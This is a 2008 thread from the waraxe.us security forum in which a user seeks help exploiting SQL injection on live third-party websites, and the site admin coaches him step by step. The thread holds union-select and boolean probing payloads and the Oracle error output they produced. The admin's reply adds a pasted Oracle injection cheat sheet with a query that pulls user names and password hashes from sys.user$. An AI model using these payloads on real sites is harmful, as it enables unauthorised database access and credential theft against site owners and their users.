Waraxe IT Security Portal
Login or Register
November 18, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 47
Members: 0
Total: 47
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Help Pro in SQL inj
Post new topicReply to topic View previous topic :: View next topic
Help Pro in SQL inj
PostPosted: Tue Feb 19, 2008 12:05 pm Reply with quote
kr0k0
Advanced user
Advanced user
Joined: Jan 26, 2008
Posts: 128




Hello , i need help Exclamation

Code:
view.php?id_page=-1'A


Error Mysql

and i right :
Code:
-1+union+select+1,2,3,4/*


Error Mysql

and whene i put :

Code:
-1+union+select+1,2,3,4,5/*


THe page changed Cool but no column number

The page is blank Confused No number

THankx
View user's profile Send private message Visit poster's website
PostPosted: Tue Feb 19, 2008 12:21 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Try this:

Code:

view.php?id_page=1+OR+


error message??

next:

Code:

view.php?id_page=1%2b1


Normal page? By the way, try with valid id_page number!

And then:

Code:

view.php?id_page=1+AND+1=1


Error message?

Code:

view.php?id_page=1%2b(SELECT+1)


Code:

view.php?id_page=1--+
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Feb 19, 2008 3:32 pm Reply with quote
kr0k0
Advanced user
Advanced user
Joined: Jan 26, 2008
Posts: 128




Code:
view.php?id_page=1+OR+

Error Mysql

Code:
view.php?id_page=1%2b1

view.php?id_page=1+AND+1=1

view.php?id_page=1%2b(SELECT+1)

view.php?id_page=1--+


Work Cool , but my problem is [ The Column number does not display in the page ] Confused

the page in Blank Confused
View user's profile Send private message Visit poster's website
PostPosted: Tue Feb 19, 2008 4:04 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




By blank you mean absolutely blank (length 0 bytes)?

If simple sql injection with visual feedback is complicated, then you can always use blind sql injection methods.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Feb 19, 2008 7:01 pm Reply with quote
kr0k0
Advanced user
Advanced user
Joined: Jan 26, 2008
Posts: 128




the page is normal , is not a 0 bytes , Confused
View user's profile Send private message Visit poster's website
PostPosted: Tue Feb 19, 2008 9:08 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Then use blind injection methods, like i suggested before. There are free tools for this -

http://www.databasesecurity.com/sqlinjection-tools.htm

Or write your own script for this.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Feb 20, 2008 11:51 am Reply with quote
kr0k0
Advanced user
Advanced user
Joined: Jan 26, 2008
Posts: 128




Ok waraxe , THankx Cool


_______________________________________________________
in auter site i find this :

Code:
.php?lang=ar&page=-1'A


Code:
Warning: ociparse() [function.ociparse]: ORA-01756: quoted string not properly terminated in /opt/apache2/htdocs/www/site_admin/site_data/main/functions_data.php on line 210

Warning: ociexecute() expects parameter 1 to be resource, boolean given in /opt/apache2/htdocs/www/site_admin/site_data/main/functions_data.php on line 212

Warning: ocifetchinto() expects parameter 1 to be resource, boolean given in /opt/apache2/htdocs/www/site_admin/site_data/main/functions_data.php on line 214

Warning: ociparse() [function.ociparse]: ORA-01756: quoted string not properly terminated in /opt/apache2/htdocs/www/site_admin/site_data/main/functions_data.php on line 234

Warning: ociexecute() expects parameter 1 to be resource, boolean given in /opt/apache2/htdocs/www/site_admin/site_data/main/functions_data.php on line 236

Warning: ocifetchinto() expects parameter 1 to be resource, boolean given in /opt/apache2/htdocs/www/site_admin/site_data/main/functions_data.php on line 238

Warning: ociparse() [function.ociparse]: ORA-01756: quoted string not properly terminated in /opt/apache2/htdocs/www/site_admin/site_data/main/visitors_counters.php on line 49

Warning: ociexecute() expects parameter 1 to be resource, boolean given in /opt/apache2/htdocs/www/site_admin/site_data/main/visitors_counters.php on line 51

Warning: ocifetchinto() expects parameter 1 to be resource, boolean given in /opt/apache2/htdocs/www/site_admin/site_data/main/visitors_counters.php on line 53


Oracle ???? Confused

and i try with this :

php?lang=ar&page=-14'+union+select+1+from+user/*


Code:
Warning: ociexecute() [function.ociexecute]: ORA-00903: invalid table name in /opt/apache2/htdocs/www/site_admin/site_data/main/functions_data.php on line 212



????????????????? Confused
View user's profile Send private message Visit poster's website
PostPosted: Wed Feb 20, 2008 1:00 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




So there is no table named "user" in current database - exactly as error message displays.

http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/

Code:

Getting Stuff
Getting Tables

SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'

Getting Columns

SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME'
Getting Current Database Name

SELECT global_name FROM global_name

Getting Users and Passwords

SELECT name, password FROM sys.user$ where type#=1

Getting version

Select banner || '-' || (select banner from v$version where banner like 'Oracle%') from v$version where banner like 'TNS%'

Getting Current User

SELECT user FROM dual
View user's profile Send private message Send e-mail Visit poster's website
Help Pro in SQL inj
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.046 Seconds